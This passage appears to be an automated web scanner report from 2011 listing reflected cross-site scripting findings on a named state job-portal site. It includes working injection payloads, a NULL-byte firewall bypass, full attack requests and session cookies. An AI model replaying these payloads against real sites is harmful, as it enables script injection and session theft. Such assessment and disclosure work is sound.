PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<a href="/ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&formid=47&rand=340991c93e5"><a>3041bdbfc36&choice=1">
...[SNIP]...
The value of the rand request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49ec8"style%3d"x%3aexpression(alert(1))"4a6109f7622c7b188 was submitted in the rand parameter. This input was echoed as 49ec8"style="x:expression(alert(1))"4a6109f7622c7b188 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The original request used the POST method; however, it was possible to convert the request to use the GET method, enabling easier demonstration and delivery of the attack.
Request
GET /ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&usvuserid_adadefault_error=&securitysys=on&formname_error=Form0&choice_error=2&cftextboxextradonotuse=&errorfields=usvuserid&cftextboxextradonotuse_error=&formname=Form0&usvuserid_error=&choice=2&submit_error=Continue&bltextboxextradonotuse1_error=&u_name_error=yes&bltextboxextradonotuse1=&formid=10&old_choice=2&rand=190249ec8"style%3d"x%3aexpression(alert(1))"4a6109f7622c7b188&old_choice_error=2&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A38%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:33 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
The value of the rand request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0050736"><a>f99e3e72883 was submitted in the rand parameter. This input was echoed as 50736"><a>f99e3e72883 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte: the WAF stops inspecting at the NULL byte, while the application reads and reflects the characters that follow it. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:33 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<a href="/ada/mn_forgotpass.cfm?securitysys=on&formid=10&rand=344110%0050736"><a>f99e3e72883&choice=1">
...[SNIP]...
The value of the securitysys request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 742ad"style%3d"x%3aexpression(alert(1))"4cd993a311c127728 was submitted in the securitysys parameter. This input was echoed as 742ad"style="x:expression(alert(1))"4cd993a311c127728 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The original request used the POST method; however, it was possible to convert the request to use the GET method, enabling easier demonstration and delivery of the attack.
Request
GET /ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&usvuserid_adadefault_error=&securitysys=on742ad"style%3d"x%3aexpression(alert(1))"4cd993a311c127728&formname_error=Form0&choice_error=2&cftextboxextradonotuse=&errorfields=usvuserid&cftextboxextradonotuse_error=&formname=Form0&usvuserid_error=&choice=2&submit_error=Continue&bltextboxextradonotuse1_error=&u_name_error=yes&bltextboxextradonotuse1=&formid=10&old_choice=2&rand=1902&old_choice_error=2&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A38%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:19 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
The value of the securitysys request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ad65"><a>dc07e9b7fc6 was submitted in the securitysys parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:03 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<a href="/ada/mn_forgotpass.cfm?securitysys=on9ad65"><a>dc07e9b7fc6&formid=10&rand=579601&choice=1">
...[SNIP]...
The value of the submit request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c951"style%3d"x%3aexpression(alert(1))"e4006df13c4 was submitted in the submit parameter. This input was echoed as 5c951"style="x:expression(alert(1))"e4006df13c4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:24 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:24'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
The value of the usvuserid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 478b6"style%3d"x%3aexpression(alert(1))"8a8c443b318 was submitted in the usvuserid parameter. This input was echoed as 478b6"style="x:expression(alert(1))"8a8c443b318 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:09 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:09'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
The value of the usvuserid_ADAdefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d82c2"style%3d"x%3aexpression(alert(1))"c7cc97eb8fb was submitted in the usvuserid_ADAdefault parameter. This input was echoed as d82c2"style="x:expression(alert(1))"c7cc97eb8fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:13 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:13'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
The value of the type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5572d"><a>89daaddf139 was submitted in the type parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ada/mn_quicksearch_dsp.cfm?type=e5572d"><a>89daaddf139&choice=1 HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:13:57 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <a href="/ada/mn_quicksearch_dsp.cfm?rand=493049&type=e5572d"><a>89daaddf139&choice=2"> ...[SNIP]...
The value of the reg%5Ftype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f47a3"style%3d"x%3aexpression(alert(1))"fb321437520 was submitted in the reg%5Ftype parameter. This input was echoed as f47a3"style="x:expression(alert(1))"fb321437520 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /ada/mn_registration_dsp.cfm?reg%5Ftype=emf47a3"style%3d"x%3aexpression(alert(1))"fb321437520 HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:23 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Expires: {ts '2011-04-29 17:14:23'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
cache-control: no-cache, no-store, must-revalidate
The value of the def request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ef0e"style%3d"x%3aexpression(alert(1))"f93f40cde7a was submitted in the def parameter. This input was echoed as 9ef0e"style="x:expression(alert(1))"f93f40cde7a in the application's response.
